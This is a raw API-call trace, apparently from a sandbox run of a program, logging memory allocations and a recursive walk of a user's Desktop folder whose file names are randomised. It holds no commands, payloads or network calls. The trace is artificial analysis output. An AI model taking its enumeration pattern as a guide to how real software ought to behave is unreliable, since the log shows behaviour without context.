[0058.075] malloc (_Size=0xc) returned 0x27f580 [0058.075] malloc (_Size=0x1a) returned 0x1c827a0 [0058.075] malloc (_Size=0x8) returned 0x1c80be0 [0058.075] free (_Block=0x1c80a70) [0058.075] malloc (_Size=0x8) returned 0x1c80a70 [0058.075] malloc (_Size=0xc) returned 0x27f598 [0058.075] malloc (_Size=0x14) returned 0x1c80380 [0058.075] malloc (_Size=0xc) returned 0x27f5b0 [0058.075] malloc (_Size=0x1a) returned 0x1c827c8 [0058.075] free (_Block=0x1c827c8) [0058.076] free (_Block=0x27f5b0) [0058.076] free (_Block=0x1c80380) [0058.076] free (_Block=0x27f598) [0058.076] free (_Block=0x1c80a70) [0058.076] malloc (_Size=0x8) returned 0x1c80a70 [0058.076] malloc (_Size=0x1a) returned 0x1c827c8 [0058.076] free (_Block=0x1c80a70) [0058.076] malloc (_Size=0x50) returned 0x1c818d8 [0058.076] malloc (_Size=0x1a) returned 0x1c80fb0 [0058.076] free (_Block=0x0) [0058.076] free (_Block=0x0) [0058.076] free (_Block=0x1c827c8) [0058.076] free (_Block=0x1c827a0) [0058.076] free (_Block=0x27f580) [0058.076] free (_Block=0x1c80360) [0058.076] free (_Block=0x27f568) [0058.076] free (_Block=0x1c80be0) [0058.076] free (_Block=0x272c10) [0058.076] free (_Block=0x1c82408) [0058.076] malloc (_Size=0x8) returned 0x1c80be0 [0058.076] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0xd22e0550, ftLastAccessTime.dwHighDateTime=0x1d5d8d6, ftLastWriteTime.dwLowDateTime=0xd22e0550, ftLastWriteTime.dwHighDateTime=0x1d5d8d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c7387a, dwReserved1=0x77f70ea9, cFileName="PYHaTu2SZet-4", cAlternateFileName="PYHATU~1")) returned 1 [0058.077] malloc (_Size=0x1c) returned 0x1c82408 [0058.077] free (_Block=0x1c80be0) [0058.077] malloc (_Size=0x1c) returned 0x272c10 [0058.077] malloc (_Size=0x4) returned 0x1c80be0 [0058.077] malloc (_Size=0xc) returned 0x27f568 [0058.077] malloc (_Size=0x14) returned 0x1c80360 [0058.077] malloc (_Size=0xc) returned 0x27f580 [0058.077] malloc (_Size=0x1c) returned 0x1c827a0 [0058.077] malloc (_Size=0x8) returned 0x1c80a70 [0058.077] free (_Block=0x1c80be0) [0058.077] malloc (_Size=0x8) returned 0x1c80be0 [0058.077] malloc (_Size=0xc) returned 0x27f598 [0058.077] malloc (_Size=0x14) returned 0x1c80380 [0058.077] malloc (_Size=0xc) returned 0x27f5b0 [0058.077] malloc (_Size=0x1c) returned 0x1c827c8 [0058.077] free (_Block=0x1c827c8) [0058.077] free (_Block=0x27f5b0) [0058.077] free (_Block=0x1c80380) [0058.077] free (_Block=0x27f598) [0058.077] free (_Block=0x1c80be0) [0058.077] malloc (_Size=0x8) returned 0x1c80be0 [0058.077] malloc (_Size=0x1c) returned 0x1c827c8 [0058.077] free (_Block=0x1c80be0) [0058.078] malloc (_Size=0x50) returned 0x1c81930 [0058.078] malloc (_Size=0x1c) returned 0x1c80fd8 [0058.078] free (_Block=0x0) [0058.078] free (_Block=0x0) [0058.078] free (_Block=0x1c827c8) [0058.078] free (_Block=0x1c827a0) [0058.078] free (_Block=0x27f580) [0058.078] free (_Block=0x1c80360) [0058.078] free (_Block=0x27f568) [0058.078] malloc (_Size=0xc) returned 0x27f568 [0058.078] malloc (_Size=0x14) returned 0x1c80360 [0058.078] malloc (_Size=0xc) returned 0x27f580 [0058.078] malloc (_Size=0x1c) returned 0x1c81000 [0058.078] malloc (_Size=0x1e) returned 0x1c827a0 [0058.078] malloc (_Size=0x10) returned 0x27f598 [0058.078] free (_Block=0x27f688) [0058.078] malloc (_Size=0x10) returned 0x27f688 [0058.078] free (_Block=0x27f658) [0058.078] malloc (_Size=0xc) returned 0x27f658 [0058.078] malloc (_Size=0x1e) returned 0x1c827c8 [0058.078] malloc (_Size=0x10) returned 0x27f5b0 [0058.078] free (_Block=0x27f4d8) [0058.078] malloc (_Size=0x7e) returned 0x1c82898 [0058.079] malloc (_Size=0x7e) returned 0x1c82920 [0058.079] free (_Block=0x1c82608) [0058.079] GetTickCount () returned 0x1146b03 [0058.079] strcmp (_Str1="Scan ", _Str2="Scan ") returned 0 [0058.079] strlen (_Str="0") returned 0x1 [0058.079] malloc (_Size=0x7e) returned 0x1c829a8 [0058.079] free (_Block=0x1c82590) [0058.079] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0058.079] malloc (_Size=0x3f) returned 0x1c82590 [0058.079] free (_Block=0x1c80f00) [0058.079] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\", cchWideChar=62, lpMultiByteStr=0x1c82590, cbMultiByte=62, lpDefaultChar=0x22ed88, lpUsedDefaultChar=0x22ed74 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\e", lpUsedDefaultChar=0x22ed74) returned 62 [0058.079] malloc (_Size=0x41) returned 0x1c80f00 [0058.079] free (_Block=0x1c82590) [0058.079] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.080] fputs (in: _Str=" 0M 22 Scan C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.080] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.080] malloc (_Size=0x4d) returned 0x1c81988 [0058.080] free (_Block=0x1c82680) [0058.081] malloc (_Size=0x7e) returned 0x1c82590 [0058.081] free (_Block=0x1c80de0) [0058.081] malloc (_Size=0x8) returned 0x1c80be0 [0058.081] malloc (_Size=0x7e) returned 0x1c80de0 [0058.081] free (_Block=0x1c80be0) [0058.081] malloc (_Size=0xc0) returned 0x1c82a30 [0058.081] free (_Block=0x1c80de0) [0058.081] malloc (_Size=0x8) returned 0x1c80be0 [0058.081] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\*", lpFindFileData=0x22eb6c | out: lpFindFileData=0x22eb6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0xd22e0550, ftLastAccessTime.dwHighDateTime=0x1d5d8d6, ftLastWriteTime.dwLowDateTime=0xd22e0550, ftLastWriteTime.dwHighDateTime=0x1d5d8d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c73ca3, dwReserved1=0x77f70c9d, cFileName=".", cAlternateFileName="")) returned 0x477bb8 [0058.081] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0xd22e0550, ftLastAccessTime.dwHighDateTime=0x1d5d8d6, ftLastWriteTime.dwLowDateTime=0xd22e0550, ftLastWriteTime.dwHighDateTime=0x1d5d8d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x11, cFileName="..", cAlternateFileName="")) returned 1 [0058.081] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77694680, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xfb79d6a0, ftLastAccessTime.dwHighDateTime=0x1d5db6a, ftLastWriteTime.dwLowDateTime=0xfb79d6a0, ftLastWriteTime.dwHighDateTime=0x1d5db6a, nFileSizeHigh=0x0, nFileSizeLow=0x902, dwReserved0=0x0, dwReserved1=0x11, cFileName="cJ6GjC62RolRRP.doc", cAlternateFileName="CJ6GJC~1.DOC")) returned 1 [0058.081] malloc (_Size=0x26) returned 0x1c80de0 [0058.081] free (_Block=0x1c80be0) [0058.081] malloc (_Size=0x26) returned 0x1c80e10 [0058.081] malloc (_Size=0x8) returned 0x1c80be0 [0058.081] malloc (_Size=0xc) returned 0x27f4d8 [0058.081] malloc (_Size=0x14) returned 0x1c80380 [0058.081] malloc (_Size=0xc) returned 0x27f5c8 [0058.081] malloc (_Size=0x1c) returned 0x1c82b10 [0058.082] malloc (_Size=0xc) returned 0x27f5e0 [0058.082] malloc (_Size=0x26) returned 0x1c80e40 [0058.082] malloc (_Size=0xc) returned 0x27f5f8 [0058.082] free (_Block=0x1c80be0) [0058.082] malloc (_Size=0xc) returned 0x27f610 [0058.082] malloc (_Size=0xc) returned 0x27f628 [0058.082] malloc (_Size=0x14) returned 0x1c80560 [0058.082] malloc (_Size=0xc) returned 0x27f640 [0058.082] malloc (_Size=0x1c) returned 0x1c82b38 [0058.082] malloc (_Size=0xc) returned 0x1c83310 [0058.082] malloc (_Size=0x26) returned 0x1c82618 [0058.082] free (_Block=0x1c82618) [0058.082] free (_Block=0x1c83310) [0058.082] free (_Block=0x1c82b38) [0058.082] free (_Block=0x27f640) [0058.082] free (_Block=0x1c80560) [0058.082] free (_Block=0x27f628) [0058.083] free (_Block=0x27f610) [0058.083] malloc (_Size=0x8) returned 0x1c80be0 [0058.083] malloc (_Size=0x26) returned 0x1c82618 [0058.083] free (_Block=0x1c80be0) [0058.083] malloc (_Size=0x50) returned 0x1c819e0 [0058.083] malloc (_Size=0x26) returned 0x1c82648 [0058.083] free (_Block=0x0) [0058.083] free (_Block=0x0) [0058.083] free (_Block=0x1c82618) [0058.083] free (_Block=0x1c80e40) [0058.083] free (_Block=0x27f5e0) [0058.083] free (_Block=0x1c82b10) [0058.083] free (_Block=0x27f5c8) [0058.083] free (_Block=0x1c80380) [0058.083] free (_Block=0x27f4d8) [0058.083] free (_Block=0x27f5f8) [0058.083] free (_Block=0x1c80e10) [0058.083] free (_Block=0x1c80de0) [0058.083] malloc (_Size=0x8) returned 0x1c80be0 [0058.083] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935f42b0, ftCreationTime.dwHighDateTime=0x1d5e198, ftLastAccessTime.dwLowDateTime=0x6ec8a050, ftLastAccessTime.dwHighDateTime=0x1d5df99, ftLastWriteTime.dwLowDateTime=0x6ec8a050, ftLastWriteTime.dwHighDateTime=0x1d5df99, nFileSizeHigh=0x0, nFileSizeLow=0x1384b, dwReserved0=0x77c7387a, dwReserved1=0x77f70c69, cFileName="eiXFsUN1f.avi", cAlternateFileName="EIXFSU~1.AVI")) returned 1 [0058.083] malloc (_Size=0x1c) returned 0x1c82b10 [0058.083] free (_Block=0x1c80be0) [0058.083] malloc (_Size=0x1c) returned 0x1c82b38 [0058.084] malloc (_Size=0x8) returned 0x1c80be0 [0058.084] malloc (_Size=0xc) returned 0x27f5f8 [0058.084] malloc (_Size=0x14) returned 0x1c80380 [0058.084] malloc (_Size=0xc) returned 0x27f4d8 [0058.084] malloc (_Size=0x1c) returned 0x1c82b60 [0058.084] malloc (_Size=0xc) returned 0x27f5c8 [0058.084] malloc (_Size=0x1c) returned 0x1c82b88 [0058.084] malloc (_Size=0xc) returned 0x27f5e0 [0058.084] free (_Block=0x1c80be0) [0058.084] malloc (_Size=0xc) returned 0x27f610 [0058.084] malloc (_Size=0xc) returned 0x27f628 [0058.084] malloc (_Size=0x14) returned 0x1c80560 [0058.084] malloc (_Size=0xc) returned 0x27f640 [0058.084] malloc (_Size=0x1c) returned 0x1c82bb0 [0058.084] malloc (_Size=0xc) returned 0x1c83310 [0058.084] malloc (_Size=0x1c) returned 0x1c82bd8 [0058.084] free (_Block=0x1c82bd8) [0058.084] free (_Block=0x1c83310) [0058.084] free (_Block=0x1c82bb0) [0058.084] free (_Block=0x27f640) [0058.084] free (_Block=0x1c80560) [0058.084] free (_Block=0x27f628) [0058.085] free (_Block=0x27f610) [0058.085] malloc (_Size=0x8) returned 0x1c80be0 [0058.085] malloc (_Size=0x1c) returned 0x1c82bb0 [0058.085] free (_Block=0x1c80be0) [0058.085] malloc (_Size=0x50) returned 0x1c81a38 [0058.085] malloc (_Size=0x1c) returned 0x1c82bd8 [0058.085] malloc (_Size=0x74) returned 0x1c80de0 [0058.085] free (_Block=0x1c82490) [0058.085] free (_Block=0x0) [0058.085] free (_Block=0x0) [0058.085] free (_Block=0x1c82bb0) [0058.085] free (_Block=0x1c82b88) [0058.085] free (_Block=0x27f5c8) [0058.085] free (_Block=0x1c82b60) [0058.085] free (_Block=0x27f4d8) [0058.085] free (_Block=0x1c80380) [0058.085] free (_Block=0x27f5f8) [0058.085] free (_Block=0x27f5e0) [0058.085] free (_Block=0x1c82b38) [0058.085] free (_Block=0x1c82b10) [0058.086] malloc (_Size=0x8) returned 0x1c80be0 [0058.086] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c9f390, ftCreationTime.dwHighDateTime=0x1d5e671, ftLastAccessTime.dwLowDateTime=0x9ca29d90, ftLastAccessTime.dwHighDateTime=0x1d5d86f, ftLastWriteTime.dwLowDateTime=0x9ca29d90, ftLastWriteTime.dwHighDateTime=0x1d5d86f, nFileSizeHigh=0x0, nFileSizeLow=0x185c2, dwReserved0=0x1c836f8, dwReserved1=0x270150, cFileName="HMZ8R.bmp", cAlternateFileName="")) returned 1 [0058.086] malloc (_Size=0x14) returned 0x1c80380 [0058.086] free (_Block=0x1c80be0) [0058.086] malloc (_Size=0x14) returned 0x1c80560 [0058.086] malloc (_Size=0x8) returned 0x1c80be0 [0058.086] malloc (_Size=0xc) returned 0x27f5e0 [0058.086] malloc (_Size=0x14) returned 0x1c80580 [0058.086] malloc (_Size=0xc) returned 0x27f5f8 [0058.086] malloc (_Size=0x1c) returned 0x1c82b10 [0058.086] malloc (_Size=0xc) returned 0x27f4d8 [0058.086] malloc (_Size=0x14) returned 0x1c805a0 [0058.086] malloc (_Size=0xc) returned 0x27f5c8 [0058.086] free (_Block=0x1c80be0) [0058.086] malloc (_Size=0xc) returned 0x27f610 [0058.086] malloc (_Size=0xc) returned 0x27f628 [0058.086] malloc (_Size=0x14) returned 0x1c805c0 [0058.086] malloc (_Size=0xc) returned 0x27f640 [0058.086] malloc (_Size=0x1c) returned 0x1c82b38 [0058.086] malloc (_Size=0xc) returned 0x1c83310 [0058.086] malloc (_Size=0x14) returned 0x1c805e0 [0058.087] free (_Block=0x1c805e0) [0058.087] free (_Block=0x1c83310) [0058.087] free (_Block=0x1c82b38) [0058.087] free (_Block=0x27f640) [0058.087] free (_Block=0x1c805c0) [0058.087] free (_Block=0x27f628) [0058.087] free (_Block=0x27f610) [0058.087] malloc (_Size=0x8) returned 0x1c80be0 [0058.087] malloc (_Size=0x14) returned 0x1c805c0 [0058.087] free (_Block=0x1c80be0) [0058.087] malloc (_Size=0x50) returned 0x1c81a90 [0058.087] malloc (_Size=0x14) returned 0x1c805e0 [0058.087] free (_Block=0x0) [0058.087] free (_Block=0x0) [0058.087] free (_Block=0x1c805c0) [0058.087] free (_Block=0x1c805a0) [0058.087] free (_Block=0x27f4d8) [0058.087] free (_Block=0x1c82b10) [0058.087] free (_Block=0x27f5f8) [0058.088] free (_Block=0x1c80580) [0058.088] free (_Block=0x27f5e0) [0058.088] free (_Block=0x27f5c8) [0058.088] free (_Block=0x1c80560) [0058.088] free (_Block=0x1c80380) [0058.088] malloc (_Size=0x8) returned 0x1c80be0 [0058.088] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x77c6e36c, ftCreationTime.dwLowDateTime=0x77f70ce9, ftCreationTime.dwHighDateTime=0x9, ftLastAccessTime.dwLowDateTime=0x2701a4, ftLastAccessTime.dwHighDateTime=0x270000, ftLastWriteTime.dwLowDateTime=0x9ca29d90, ftLastWriteTime.dwHighDateTime=0x1d5d86f, nFileSizeHigh=0xb60012, nFileSizeLow=0x4a, dwReserved0=0x1c836f8, dwReserved1=0x270150, cFileName="HMZ8\x13²J", cAlternateFileName="")) returned 0 [0058.088] GetLastError () returned 0x12 [0058.088] free (_Block=0x1c80be0) [0058.088] free (_Block=0x1c82a30) [0058.088] FindClose (in: hFindFile=0x477bb8 | out: hFindFile=0x477bb8) returned 1 [0058.088] free (_Block=0x1c82898) [0058.088] free (_Block=0x1c827a0) [0058.088] free (_Block=0x1c81000) [0058.088] free (_Block=0x27f580) [0058.088] free (_Block=0x1c80360) [0058.088] free (_Block=0x27f568) [0058.088] free (_Block=0x1c80a70) [0058.088] free (_Block=0x272c10) [0058.089] free (_Block=0x1c82408) [0058.089] malloc (_Size=0x8) returned 0x1c80a70 [0058.089] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b4dd90, ftCreationTime.dwHighDateTime=0x1d5dad6, ftLastAccessTime.dwLowDateTime=0x691c2820, ftLastAccessTime.dwHighDateTime=0x1d5db2a, ftLastWriteTime.dwLowDateTime=0x691c2820, ftLastWriteTime.dwHighDateTime=0x1d5db2a, nFileSizeHigh=0x0, nFileSizeLow=0x8241, dwReserved0=0x270000, dwReserved1=0x1c82798, cFileName="q4vqwq7Oz6niAh.png", cAlternateFileName="Q4VQWQ~1.PNG")) returned 1 [0058.089] malloc (_Size=0x26) returned 0x272c10 [0058.089] free (_Block=0x1c80a70) [0058.089] malloc (_Size=0x26) returned 0x1c82618 [0058.089] malloc (_Size=0x4) returned 0x1c80a70 [0058.089] malloc (_Size=0xc) returned 0x27f568 [0058.089] malloc (_Size=0x14) returned 0x1c80360 [0058.089] malloc (_Size=0xc) returned 0x27f580 [0058.089] malloc (_Size=0x26) returned 0x1c81000 [0058.089] malloc (_Size=0x8) returned 0x1c80be0 [0058.089] free (_Block=0x1c80a70) [0058.089] malloc (_Size=0x8) returned 0x1c80a70 [0058.089] malloc (_Size=0xc) returned 0x27f5c8 [0058.089] malloc (_Size=0x14) returned 0x1c80380 [0058.089] malloc (_Size=0xc) returned 0x27f5e0 [0058.089] malloc (_Size=0x26) returned 0x1c82678 [0058.089] free (_Block=0x1c82678) [0058.090] free (_Block=0x27f5e0) [0058.090] free (_Block=0x1c80380) [0058.090] free (_Block=0x27f5c8) [0058.090] free (_Block=0x1c80a70) [0058.090] malloc (_Size=0x8) returned 0x1c80a70 [0058.090] malloc (_Size=0x26) returned 0x1c82678 [0058.090] free (_Block=0x1c80a70) [0058.090] malloc (_Size=0x50) returned 0x1c81ae8 [0058.090] malloc (_Size=0x26) returned 0x1c82490 [0058.090] free (_Block=0x0) [0058.090] free (_Block=0x0) [0058.090] free (_Block=0x1c82678) [0058.090] free (_Block=0x1c81000) [0058.090] free (_Block=0x27f580) [0058.090] free (_Block=0x1c80360) [0058.090] free (_Block=0x27f568) [0058.090] free (_Block=0x1c80be0) [0058.090] free (_Block=0x1c82618) [0058.090] free (_Block=0x272c10) [0058.091] malloc (_Size=0x8) returned 0x1c80be0 [0058.091] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a31c400, ftCreationTime.dwHighDateTime=0x1d5e23a, ftLastAccessTime.dwLowDateTime=0xf7fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5da12, ftLastWriteTime.dwLowDateTime=0xf7fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5da12, nFileSizeHigh=0x0, nFileSizeLow=0x17051, dwReserved0=0x77c7387a, dwReserved1=0x77f70ea9, cFileName="Rg_8VLCBiVD.csv", cAlternateFileName="RG_8VL~1.CSV")) returned 1 [0058.091] malloc (_Size=0x20) returned 0x1c82b10 [0058.091] free (_Block=0x1c80be0) [0058.091] malloc (_Size=0x20) returned 0x1c82b38 [0058.091] malloc (_Size=0x4) returned 0x1c80be0 [0058.091] malloc (_Size=0xc) returned 0x27f568 [0058.091] malloc (_Size=0x14) returned 0x1c80360 [0058.091] malloc (_Size=0xc) returned 0x27f580 [0058.091] malloc (_Size=0x20) returned 0x1c82b60 [0058.091] malloc (_Size=0x8) returned 0x1c80a70 [0058.091] free (_Block=0x1c80be0) [0058.091] malloc (_Size=0x8) returned 0x1c80be0 [0058.091] malloc (_Size=0xc) returned 0x27f5c8 [0058.091] malloc (_Size=0x14) returned 0x1c80380 [0058.091] malloc (_Size=0xc) returned 0x27f5e0 [0058.091] malloc (_Size=0x20) returned 0x1c82b88 [0058.091] free (_Block=0x1c82b88) [0058.091] free (_Block=0x27f5e0) [0058.091] free (_Block=0x1c80380) [0058.091] free (_Block=0x27f5c8) [0058.092] free (_Block=0x1c80be0) [0058.092] malloc (_Size=0x8) returned 0x1c80be0 [0058.092] malloc (_Size=0x20) returned 0x1c82b88 [0058.092] free (_Block=0x1c80be0) [0058.092] malloc (_Size=0x50) returned 0x1c81b40 [0058.092] malloc (_Size=0x20) returned 0x1c82bb0 [0058.092] free (_Block=0x0) [0058.092] free (_Block=0x0) [0058.092] free (_Block=0x1c82b88) [0058.092] free (_Block=0x1c82b60) [0058.092] free (_Block=0x27f580) [0058.092] free (_Block=0x1c80360) [0058.092] free (_Block=0x27f568) [0058.092] free (_Block=0x1c80a70) [0058.092] free (_Block=0x1c82b38) [0058.092] free (_Block=0x1c82b10) [0058.092] malloc (_Size=0x8) returned 0x1c80a70 [0058.092] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x53644130, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0x53644130, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c7387a, dwReserved1=0x77f70ea9, cFileName="Vh5MbuS", cAlternateFileName="")) returned 1 [0058.092] malloc (_Size=0x10) returned 0x27f568 [0058.092] free (_Block=0x1c80a70) [0058.092] malloc (_Size=0x10) returned 0x27f580 [0058.092] malloc (_Size=0x4) returned 0x1c80a70 [0058.092] malloc (_Size=0xc) returned 0x27f5c8 [0058.093] malloc (_Size=0x14) returned 0x1c80360 [0058.093] malloc (_Size=0xc) returned 0x27f5e0 [0058.093] malloc (_Size=0x10) returned 0x27f5f8 [0058.093] malloc (_Size=0x8) returned 0x1c80be0 [0058.093] free (_Block=0x1c80a70) [0058.093] malloc (_Size=0x8) returned 0x1c80a70 [0058.093] malloc (_Size=0xc) returned 0x27f4d8 [0058.093] malloc (_Size=0x14) returned 0x1c80380 [0058.093] malloc (_Size=0xc) returned 0x27f610 [0058.093] malloc (_Size=0x10) returned 0x27f628 [0058.093] free (_Block=0x27f628) [0058.093] free (_Block=0x27f610) [0058.093] free (_Block=0x1c80380) [0058.093] free (_Block=0x27f4d8) [0058.093] free (_Block=0x1c80a70) [0058.093] malloc (_Size=0x8) returned 0x1c80a70 [0058.093] malloc (_Size=0x10) returned 0x27f4d8 [0058.093] free (_Block=0x1c80a70) [0058.093] malloc (_Size=0x50) returned 0x1c81b98 [0058.093] malloc (_Size=0x10) returned 0x27f610 [0058.093] free (_Block=0x0) [0058.093] free (_Block=0x0) [0058.093] free (_Block=0x27f4d8) [0058.093] free (_Block=0x27f5f8) [0058.093] free (_Block=0x27f5e0) [0058.093] free (_Block=0x1c80360) [0058.094] free (_Block=0x27f5c8) [0058.094] malloc (_Size=0xc) returned 0x27f5c8 [0058.094] malloc (_Size=0x14) returned 0x1c80360 [0058.094] malloc (_Size=0xc) returned 0x27f5e0 [0058.094] malloc (_Size=0x10) returned 0x27f5f8 [0058.094] malloc (_Size=0x12) returned 0x1c80380 [0058.094] malloc (_Size=0x18) returned 0x1c80560 [0058.094] free (_Block=0x27f598) [0058.094] malloc (_Size=0x18) returned 0x1c80580 [0058.094] free (_Block=0x27f688) [0058.094] malloc (_Size=0xc) returned 0x27f688 [0058.094] malloc (_Size=0x12) returned 0x1c805a0 [0058.094] malloc (_Size=0x18) returned 0x1c805c0 [0058.094] free (_Block=0x27f5b0) [0058.094] malloc (_Size=0x72) returned 0x1c82898 [0058.094] GetTickCount () returned 0x1146b13 [0058.094] malloc (_Size=0x8) returned 0x1c80a70 [0058.094] malloc (_Size=0x72) returned 0x1c82a30 [0058.094] free (_Block=0x1c80a70) [0058.094] malloc (_Size=0xc0) returned 0x1c836f8 [0058.094] free (_Block=0x1c82a30) [0058.094] malloc (_Size=0x8) returned 0x1c80a70 [0058.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\*", lpFindFileData=0x22eb6c | out: lpFindFileData=0x22eb6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x53644130, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0x53644130, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c73ca3, dwReserved1=0x77f70c9d, cFileName=".", cAlternateFileName="")) returned 0x477bb8 [0058.095] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x53644130, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0x53644130, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x270150, dwReserved1=0x270150, cFileName="..", cAlternateFileName="")) returned 1 [0058.095] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77cea4e0, ftCreationTime.dwHighDateTime=0x1d5e004, ftLastAccessTime.dwLowDateTime=0xfe1ee190, ftLastAccessTime.dwHighDateTime=0x1d5d88e, ftLastWriteTime.dwLowDateTime=0xfe1ee190, ftLastWriteTime.dwHighDateTime=0x1d5d88e, nFileSizeHigh=0x0, nFileSizeLow=0xefbc, dwReserved0=0x270150, dwReserved1=0x270150, cFileName="3Ys6XUI1zSfF0RejyCi.pps", cAlternateFileName="3YS6XU~1.PPS")) returned 1 [0058.095] malloc (_Size=0x30) returned 0x1c824c0 [0058.095] free (_Block=0x1c80a70) [0058.095] malloc (_Size=0x30) returned 0x1c81000 [0058.095] malloc (_Size=0x8) returned 0x1c80a70 [0058.095] malloc (_Size=0xc) returned 0x27f5b0 [0058.095] malloc (_Size=0x14) returned 0x1c80600 [0058.095] malloc (_Size=0xc) returned 0x27f598 [0058.095] malloc (_Size=0x10) returned 0x27f4d8 [0058.095] malloc (_Size=0xc) returned 0x27f628 [0058.095] malloc (_Size=0x30) returned 0x1c82678 [0058.095] malloc (_Size=0xc) returned 0x27f640 [0058.095] free (_Block=0x1c80a70) [0058.095] malloc (_Size=0xc) returned 0x1c83310 [0058.095] malloc (_Size=0xc) returned 0x1c83328 [0058.095] malloc (_Size=0x14) returned 0x1c80620 [0058.095] malloc (_Size=0xc) returned 0x1c83340 [0058.096] malloc (_Size=0x10) returned 0x1c83358 [0058.096] malloc (_Size=0xc) returned 0x1c83370 [0058.096] malloc (_Size=0x30) returned 0x1c82a30 [0058.096] free (_Block=0x1c82a30) [0058.096] free (_Block=0x1c83370) [0058.096] free (_Block=0x1c83358) [0058.096] free (_Block=0x1c83340) [0058.096] free (_Block=0x1c80620) [0058.096] free (_Block=0x1c83328) [0058.096] free (_Block=0x1c83310) [0058.096] malloc (_Size=0x8) returned 0x1c80a70 [0058.096] malloc (_Size=0x30) returned 0x1c82a30 [0058.096] free (_Block=0x1c80a70) [0058.096] malloc (_Size=0x50) returned 0x1c81bf0 [0058.096] malloc (_Size=0x30) returned 0x1c82a68 [0058.096] free (_Block=0x0) [0058.096] free (_Block=0x0) [0058.096] free (_Block=0x1c82a30) [0058.096] free (_Block=0x1c82678) [0058.096] free (_Block=0x27f628) [0058.096] free (_Block=0x27f4d8) [0058.096] free (_Block=0x27f598) [0058.096] free (_Block=0x1c80600) [0058.097] free (_Block=0x27f5b0) [0058.097] free (_Block=0x27f640) [0058.097] free (_Block=0x1c81000) [0058.097] free (_Block=0x1c824c0) [0058.097] 